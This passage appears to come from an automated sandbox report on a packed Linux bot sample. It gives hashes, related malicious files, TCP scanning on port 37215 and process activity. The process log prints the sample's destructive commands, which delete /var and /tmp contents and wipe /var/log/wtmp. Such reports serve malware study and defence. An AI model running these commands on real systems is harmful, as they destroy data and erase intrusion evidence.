                              • 115.112.63.121
                              GIGAINFRASoftbankBBCorpJParmGet hashmaliciousBrowse
                              • 219.63.208.12
                              TFiqcmldz5Get hashmaliciousBrowse
                              • 218.181.74.39
                              z0x3n.x86-20211110-2150Get hashmaliciousBrowse
                              • 126.158.18.108
                              z0x3n.arm7-20211110-2150Get hashmaliciousBrowse
                              • 126.26.48.73
                              sora.mpslGet hashmaliciousBrowse
                              • 221.83.33.106
                              l0vNaPgd6fGet hashmaliciousBrowse
                              • 218.129.236.192
                              8fVDxGRR8SGet hashmaliciousBrowse
                              • 219.33.187.56
                              3ObdCtrussGet hashmaliciousBrowse
                              • 126.254.59.90
                              63BjZ1IcIhGet hashmaliciousBrowse
                              • 126.240.223.75
                              QXFOZ3CshcGet hashmaliciousBrowse
                              • 60.109.253.115
                              sora.x86Get hashmaliciousBrowse
                              • 61.245.73.61
                              sora.arm7Get hashmaliciousBrowse
                              • 60.132.89.77
                              sora.armGet hashmaliciousBrowse
                              • 60.66.177.39
                              DVHEnaPp2dGet hashmaliciousBrowse
                              • 60.93.167.115
                              HwcNrhNfZgGet hashmaliciousBrowse
                              • 126.128.203.128
                              X5bKvoLX1EGet hashmaliciousBrowse
                              • 219.209.94.139
                              e9e6i5D2gKGet hashmaliciousBrowse
                              • 126.89.139.234
                              eGH4d5FDoUGet hashmaliciousBrowse
                              • 220.54.222.144
                              hz4vFpTJb8Get hashmaliciousBrowse
                              • 126.83.241.213
                              0LuSWzDmJGGet hashmaliciousBrowse
                              • 126.67.58.198
                              airtel-tz-asTZarmGet hashmaliciousBrowse
                              • 197.152.229.163
                              ecuuS2WNmQGet hashmaliciousBrowse
                              • 156.158.248.163
                              dYgJ72oG4fGet hashmaliciousBrowse
                              • 156.158.49.35
                              byxEpar5ZmGet hashmaliciousBrowse
                              • 197.152.229.157
                              wsVomvavHjGet hashmaliciousBrowse
                              • 156.158.50.52
                              y2NMF6ulOIGet hashmaliciousBrowse
                              • 197.152.229.150
                              sora.armGet hashmaliciousBrowse
                              • 156.159.153.6
                              zJk9UEOnQ7Get hashmaliciousBrowse
                              • 156.158.50.68
                              TlhOKlVSwfGet hashmaliciousBrowse
                              • 156.158.51.130
                              eFsSvDKamsGet hashmaliciousBrowse
                              • 156.158.51.118
                              KHSQ48GkGnGet hashmaliciousBrowse
                              • 156.158.98.11
                              Hilix.armGet hashmaliciousBrowse
                              • 156.158.248.174
                              Hilix.x86Get hashmaliciousBrowse
                              • 156.158.50.70
                              oiHTZaiKnIGet hashmaliciousBrowse
                              • 156.158.50.45
                              armGet hashmaliciousBrowse
                              • 156.158.98.25
                              QtNnZoNz75Get hashmaliciousBrowse
                              • 197.187.71.28
                              zju8TB277lGet hashmaliciousBrowse
                              • 197.152.130.201
                              armGet hashmaliciousBrowse
                              • 156.158.248.172
                              FWsCarsq8QGet hashmaliciousBrowse
                              • 156.156.2.91
                              tqQd9hibj0Get hashmaliciousBrowse
                              • 156.158.50.72

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink
                              Process:/usr/bin/pulseaudio
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):10
                              Entropy (8bit):2.9219280948873623
                              Encrypted:false
                              SSDEEP:3:5bkPn:pkP
                              MD5:FF001A15CE15CF062A3704CEA2991B5F
                              SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                              SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                              SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: auto_null.
                              /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source
                              Process:/usr/bin/pulseaudio
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):18
                              Entropy (8bit):3.4613201402110088
                              Encrypted:false
                              SSDEEP:3:5bkrIZsXvn:pkckv
                              MD5:28FE6435F34B3367707BB1C5D5F6B430
                              SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                              SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                              SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: auto_null.monitor.
                              /proc/5368/oom_score_adj
                              Process:/usr/sbin/sshd
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):6
                              Entropy (8bit):1.7924812503605778
                              Encrypted:false
                              SSDEEP:3:ptn:Dn
                              MD5:CBF282CC55ED0792C33D10003D1F760A
                              SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                              SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                              SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview: -1000.
                              /run/sshd.pid
                              Process:/usr/sbin/sshd
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):5
                              Entropy (8bit):2.321928094887362
                              Encrypted:false
                              SSDEEP:3:DTdv:Pdv
                              MD5:123E8A88210D5C9186E1F5BC01223E18
                              SHA1:D3874690DC88C5B35F16FD1E22FD9509F7F7B94F
                              SHA-256:1DD2196542EF5185965E6622A861D1654828AAF9A59928D18C9F4C1B3AC59781
                              SHA-512:D77DE391A3B38536003D456E2C34225BB4B4CE643F02FFF7F83E0E6CD491D742BED0E922E583602B400A3C25E4C302E2CBD66737629B6C88397503084A15AA33
                              Malicious:false
                              Reputation:low
                              Preview: 5368.
                              /run/systemd/resolve/stub-resolv.conf
                              Process:/tmp/x86
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):38
                              Entropy (8bit):3.3918926446809334
                              Encrypted:false
                              SSDEEP:3:KkZRAkd:KaAu
                              MD5:C7EA09D26E26605227076E0514A33038
                              SHA1:C3F9736E9AF7BD0885578859A50B205C8FA5FC8E
                              SHA-256:7E8AD76E0D200E93918CA2E93C99FF8ECD02071953BF1479819DB3AC0DBB6D07
                              SHA-512:17D0088725EB9991E9EB82E8A3DE0878E45E6F394BBC2AD260AA59C786FF0AD565E145E21256425D1C0ABE15F3ECB402EBB0A6A5E1C2D5BA7A4D95EC93A2861F
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: nameserver 8.8.8.8.nameserver 8.8.4.4.
                              /run/user/1000/pulse/pid
                              Process:/usr/bin/pulseaudio
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):5
                              Entropy (8bit):2.321928094887362
                              Encrypted:false
                              SSDEEP:3:Eun:Eu
                              MD5:E40FA240615445A4AB185E263D5A642E
                              SHA1:70F7B46430AB6CF197A5B8ABE61363FD4F189E68
                              SHA-256:EEB67D767BFBDB98DBDA2DDDC8F8D369145FCFE1AA4196101A9ABA3B2C613EFE
                              SHA-512:150531E1DFB7424978076B749E786ADD712D67367019D2EE9EF0581727D073308F32AA935450AC0DE8884D432A3B306B38AAC2D13EE072663ABEAF994E88EC56
                              Malicious:false
                              Reputation:low
                              Preview: 5410.
                              /var/log/gpu-manager.log
                              Process:/usr/bin/gpu-manager
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):1515
                              Entropy (8bit):4.825813629825568
                              Encrypted:false
                              SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555Ro7uRkoT:wPXXXe6vejpeC2HUR5WkpPpcvAdow959
                              MD5:7B48386106F00126E44F428D0193E1ED
                              SHA1:75F652293B2DE03A845A73B678A5CB7E9701A9F4
                              SHA-256:9F60B5D0D5C6F6CB3892E1687D16333F36E3BD450713B00FDF0B2BB90EC7312C
                              SHA-512:57D0856EC65558B4A843A4696B644AC3E80B3EA0E6EC1C2FAC7A00015B96EBB2CC30967EB8DEFC3E648E59AC6882F6A4F69468D4B6CD0FD60F9F343C206DBFBC
                              Malicious:false
                              Preview: log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce
                              /var/run/gdm3.pid
                              Process:/usr/sbin/gdm3
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):5
                              Entropy (8bit):1.9219280948873623
                              Encrypted:false
                              SSDEEP:3:Fd/n:n/n
                              MD5:5DE88F8B8A42BF20A95C7C449C13D8DE
                              SHA1:42E07D8ECA0D77F8445F835510C1C634DC89E74F
                              SHA-256:F9615512F25BC98071A42105AA4A18C4FD1E77EE6B8E7B63B60BAB517DC0114A
                              SHA-512:5E1C807B5E7CA6E7A27545BE9418C1954AF3DCA07DE61C9768FCC333A13D646D116DF3B4197B1E106B5C0920DA6FB96FBF83C2F0081937163F22B2FA484661DE
                              Malicious:false
                              Preview: 5582.

                              Static File Info

                              General

                              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
                              Entropy (8bit):7.965405452553123
                              TrID:
                              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                              File name:x86
                              File size:42980
                              MD5:776097f22f49b5f4c467e2afdee63009
                              SHA1:540cb7d95922f31459afb94d6b37827b41bf677e
                              SHA256:c817429ed299ec43b67bf47aad81081496d8ab45afe231890bdb564f4bf4db7d
                              SHA512:c6d5fc772deae715e61e36aa808314e6acd2c5c7696535cc58e0d4bf6dc12adfd542d8633a685e0527b7111594378f4a6408a1539986deeb9035025550e4e39a
                              SSDEEP:768:St/U6LU5Klt+u+ul5BhMGCykxB8kdtObBcedEjUnbcuyD7UGQRjV:q/LhIbykf8ltcedlnouy8GyZ
                              File Content Preview:.ELF........................4...........4. ...(.........................................D...Dm..Dm..................Q.td.............................-Z.UPX!....................T..........?..k.I/.j....\.d*nlz.eze {...v..+......R......f.....6..}../..'z.....

                              Static ELF Info

                              ELF header

                              Class:ELF32
                              Data:2's complement, little endian
                              Version:1 (current)
                              Machine:Intel 80386
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:UNIX - Linux
                              ABI Version:0
                              Entry Point Address:0xc0a4f8
                              Flags:0x0
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:3
                              Section Header Offset:0
                              Section Header Size:40
                              Number of Section Headers:0
                              Header String Table Index:0

                              Program Segments

                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00xc010000xc010000xa6ec0xa6ec4.07890x5R E0x1000
                              LOAD0xd440x8066d440x8066d440x00x00.00000x6RW 0x1000
                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 11, 2021 03:03:35.712917089 CET4850037215192.168.2.23156.132.235.75
                              Nov 11, 2021 03:03:35.712929964 CET4850037215192.168.2.23197.64.238.75
                              Nov 11, 2021 03:03:35.712949991 CET4850037215192.168.2.23197.169.115.49
                              Nov 11, 2021 03:03:35.712970018 CET4850037215192.168.2.23156.223.17.18
                              Nov 11, 2021 03:03:35.712973118 CET4850037215192.168.2.2341.243.213.175
                              Nov 11, 2021 03:03:35.712976933 CET4850037215192.168.2.23197.162.0.34
                              Nov 11, 2021 03:03:35.712977886 CET4850037215192.168.2.23156.205.100.111
                              Nov 11, 2021 03:03:35.712984085 CET4850037215192.168.2.23156.217.17.76
                              Nov 11, 2021 03:03:35.712986946 CET4850037215192.168.2.23156.236.63.110
                              Nov 11, 2021 03:03:35.712995052 CET4850037215192.168.2.23197.250.231.228
                              Nov 11, 2021 03:03:35.713006020 CET4850037215192.168.2.23156.66.156.222
                              Nov 11, 2021 03:03:35.713020086 CET4850037215192.168.2.2341.187.70.94
                              Nov 11, 2021 03:03:35.713018894 CET4850037215192.168.2.23197.145.181.70
                              Nov 11, 2021 03:03:35.713035107 CET4850037215192.168.2.23156.88.123.182
                              Nov 11, 2021 03:03:35.713037014 CET4850037215192.168.2.2341.4.20.59
                              Nov 11, 2021 03:03:35.713038921 CET4850037215192.168.2.2341.148.250.73
                              Nov 11, 2021 03:03:35.713041067 CET4850037215192.168.2.23156.50.184.22
                              Nov 11, 2021 03:03:35.713046074 CET4850037215192.168.2.23156.9.220.181
                              Nov 11, 2021 03:03:35.713052034 CET4850037215192.168.2.23197.15.78.63
                              Nov 11, 2021 03:03:35.713056087 CET4850037215192.168.2.2341.226.3.102
                              Nov 11, 2021 03:03:35.713059902 CET4850037215192.168.2.23156.33.233.51
                              Nov 11, 2021 03:03:35.713068008 CET4850037215192.168.2.23156.239.48.166
                              Nov 11, 2021 03:03:35.713074923 CET4850037215192.168.2.23197.125.79.166
                              Nov 11, 2021 03:03:35.713087082 CET4850037215192.168.2.2341.45.213.65
                              Nov 11, 2021 03:03:35.713094950 CET4850037215192.168.2.23197.254.225.88
                              Nov 11, 2021 03:03:35.713103056 CET4850037215192.168.2.2341.39.106.97
                              Nov 11, 2021 03:03:35.713109016 CET4850037215192.168.2.23197.61.177.151
                              Nov 11, 2021 03:03:35.713109970 CET4850037215192.168.2.2341.188.169.108
                              Nov 11, 2021 03:03:35.713120937 CET4850037215192.168.2.23156.219.220.143
                              Nov 11, 2021 03:03:35.713135958 CET4850037215192.168.2.23197.46.33.194
                              Nov 11, 2021 03:03:35.713162899 CET4850037215192.168.2.23156.90.119.104
                              Nov 11, 2021 03:03:35.713162899 CET4850037215192.168.2.23197.15.87.149
                              Nov 11, 2021 03:03:35.713165998 CET4850037215192.168.2.2341.72.111.79
                              Nov 11, 2021 03:03:35.713176012 CET4850037215192.168.2.2341.185.178.168
                              Nov 11, 2021 03:03:35.713180065 CET4850037215192.168.2.23156.112.150.242
                              Nov 11, 2021 03:03:35.713188887 CET4850037215192.168.2.23197.53.243.40
                              Nov 11, 2021 03:03:35.713232040 CET4850037215192.168.2.23197.246.254.187
                              Nov 11, 2021 03:03:35.713234901 CET4850037215192.168.2.2341.182.248.223
                              Nov 11, 2021 03:03:35.713244915 CET4850037215192.168.2.23156.204.147.67
                              Nov 11, 2021 03:03:35.713247061 CET4850037215192.168.2.23197.219.77.194
                              Nov 11, 2021 03:03:35.713257074 CET4850037215192.168.2.2341.104.90.28
                              Nov 11, 2021 03:03:35.713264942 CET4850037215192.168.2.23156.60.22.180
                              Nov 11, 2021 03:03:35.713290930 CET4850037215192.168.2.2341.38.175.166
                              Nov 11, 2021 03:03:35.713306904 CET4850037215192.168.2.23197.180.177.204
                              Nov 11, 2021 03:03:35.713310003 CET4850037215192.168.2.23197.199.51.96
                              Nov 11, 2021 03:03:35.713323116 CET4850037215192.168.2.2341.10.166.184
                              Nov 11, 2021 03:03:35.713325024 CET4850037215192.168.2.2341.179.58.201
                              Nov 11, 2021 03:03:35.713325977 CET4850037215192.168.2.23197.217.58.0
                              Nov 11, 2021 03:03:35.713335991 CET4850037215192.168.2.23156.94.149.198
                              Nov 11, 2021 03:03:35.713336945 CET4850037215192.168.2.23156.147.188.138
                              Nov 11, 2021 03:03:35.713339090 CET4850037215192.168.2.23156.124.129.249
                              Nov 11, 2021 03:03:35.713351965 CET4850037215192.168.2.2341.101.220.63
                              Nov 11, 2021 03:03:35.713356972 CET4850037215192.168.2.23197.201.169.2
                              Nov 11, 2021 03:03:35.713359118 CET4850037215192.168.2.23197.38.125.57
                              Nov 11, 2021 03:03:35.713368893 CET4850037215192.168.2.23156.2.59.4
                              Nov 11, 2021 03:03:35.713388920 CET4850037215192.168.2.23197.39.150.213
                              Nov 11, 2021 03:03:35.713399887 CET4850037215192.168.2.23197.54.63.30
                              Nov 11, 2021 03:03:35.713413000 CET4850037215192.168.2.23197.66.201.104
                              Nov 11, 2021 03:03:35.713413954 CET4850037215192.168.2.23156.230.170.2
                              Nov 11, 2021 03:03:35.713421106 CET4850037215192.168.2.2341.55.57.221
                              Nov 11, 2021 03:03:35.713428020 CET4850037215192.168.2.23156.27.236.245
                              Nov 11, 2021 03:03:35.713437080 CET4850037215192.168.2.23156.234.149.117
                              Nov 11, 2021 03:03:35.713438988 CET4850037215192.168.2.23197.59.243.109
                              Nov 11, 2021 03:03:35.713443995 CET4850037215192.168.2.23197.87.143.243
                              Nov 11, 2021 03:03:35.713457108 CET4850037215192.168.2.23197.217.50.117
                              Nov 11, 2021 03:03:35.713465929 CET4850037215192.168.2.23156.123.216.66
                              Nov 11, 2021 03:03:35.713478088 CET4850037215192.168.2.23156.164.75.99
                              Nov 11, 2021 03:03:35.713479042 CET4850037215192.168.2.2341.112.107.0
                              Nov 11, 2021 03:03:35.713485956 CET4850037215192.168.2.23197.92.198.40
                              Nov 11, 2021 03:03:35.713489056 CET4850037215192.168.2.23156.75.18.166
                              Nov 11, 2021 03:03:35.713498116 CET4850037215192.168.2.23197.183.84.21
                              Nov 11, 2021 03:03:35.713505030 CET4850037215192.168.2.23156.80.255.229
                              Nov 11, 2021 03:03:35.713526011 CET4850037215192.168.2.23197.241.100.248
                              Nov 11, 2021 03:03:35.713525057 CET4850037215192.168.2.2341.184.197.8
                              Nov 11, 2021 03:03:35.713529110 CET4850037215192.168.2.23197.245.25.83
                              Nov 11, 2021 03:03:35.713546038 CET4850037215192.168.2.23197.233.89.106
                              Nov 11, 2021 03:03:35.713556051 CET4850037215192.168.2.23156.168.52.50
                              Nov 11, 2021 03:03:35.713558912 CET4850037215192.168.2.23156.74.177.168
                              Nov 11, 2021 03:03:35.713563919 CET4850037215192.168.2.23156.32.99.125
                              Nov 11, 2021 03:03:35.713574886 CET4850037215192.168.2.23197.81.168.3
                              Nov 11, 2021 03:03:35.713584900 CET4850037215192.168.2.23156.252.117.119
                              Nov 11, 2021 03:03:35.713593960 CET4850037215192.168.2.23156.204.114.88
                              Nov 11, 2021 03:03:35.713603973 CET4850037215192.168.2.2341.142.201.92
                              Nov 11, 2021 03:03:35.713619947 CET4850037215192.168.2.2341.153.113.9
                              Nov 11, 2021 03:03:35.713622093 CET4850037215192.168.2.23156.24.4.176
                              Nov 11, 2021 03:03:35.713632107 CET4850037215192.168.2.23156.223.129.169
                              Nov 11, 2021 03:03:35.713640928 CET4850037215192.168.2.23197.161.237.217
                              Nov 11, 2021 03:03:35.713645935 CET4850037215192.168.2.2341.203.157.142
                              Nov 11, 2021 03:03:35.713664055 CET4850037215192.168.2.23156.249.43.225
                              Nov 11, 2021 03:03:35.713665009 CET4850037215192.168.2.23156.85.5.232
                              Nov 11, 2021 03:03:35.713669062 CET4850037215192.168.2.23156.90.120.167
                              Nov 11, 2021 03:03:35.713681936 CET4850037215192.168.2.2341.228.188.42
                              Nov 11, 2021 03:03:35.713692904 CET4850037215192.168.2.23156.200.249.5
                              Nov 11, 2021 03:03:35.713696957 CET4850037215192.168.2.23197.91.185.114
                              Nov 11, 2021 03:03:35.713707924 CET4850037215192.168.2.23156.153.64.50
                              Nov 11, 2021 03:03:35.713710070 CET4850037215192.168.2.23156.32.95.52
                              Nov 11, 2021 03:03:35.713710070 CET4850037215192.168.2.2341.93.15.186
                              Nov 11, 2021 03:03:35.713721991 CET4850037215192.168.2.23197.224.7.237
                              Nov 11, 2021 03:03:35.713726997 CET4850037215192.168.2.23197.82.168.154
                              Nov 11, 2021 03:03:35.713728905 CET4850037215192.168.2.23197.31.107.159

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Nov 11, 2021 03:04:22.575949907 CET192.168.2.238.8.8.80xf1b4Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)
                              Nov 11, 2021 03:04:22.575997114 CET192.168.2.238.8.8.80x35b6Standard query (0)daisy.ubuntu.com28IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Nov 11, 2021 03:04:22.594293118 CET8.8.8.8192.168.2.230xf1b4No error (0)daisy.ubuntu.com162.213.33.108A (IP address)IN (0x0001)
                              Nov 11, 2021 03:04:22.594293118 CET8.8.8.8192.168.2.230xf1b4No error (0)daisy.ubuntu.com162.213.33.132A (IP address)IN (0x0001)

                              System Behavior

                              Analysis Process: x86 PID: 5245 Parent PID: 5120

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:/tmp/x86
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5246 Parent PID: 5245

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5247 Parent PID: 5245

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5249 Parent PID: 5245

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5250 Parent PID: 5245

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5251 Parent PID: 5245

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5252 Parent PID: 5245

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5253 Parent PID: 5252

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5254 Parent PID: 5252

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5255 Parent PID: 5254

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: x86 PID: 5256 Parent PID: 5255

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5256 Parent PID: 5255

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5257 Parent PID: 5256

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: rm PID: 5257 Parent PID: 5256

                              General

                              Start time:03:03:34
                              Start date:11/11/2021
                              Path:/usr/bin/rm
                              Arguments:rm -rf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /tmp/x86 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Analysis Process: x86 PID: 5265 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5265 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "rm -rf /var/log/wtmp"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5266 Parent PID: 5265

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: rm PID: 5266 Parent PID: 5265

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/usr/bin/rm
                              Arguments:rm -rf /var/log/wtmp
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Analysis Process: x86 PID: 5267 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5267 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "rm -rf /tmp/*"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5268 Parent PID: 5267

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: rm PID: 5268 Parent PID: 5267

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/usr/bin/rm
                              Arguments:rm -rf /tmp/*
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

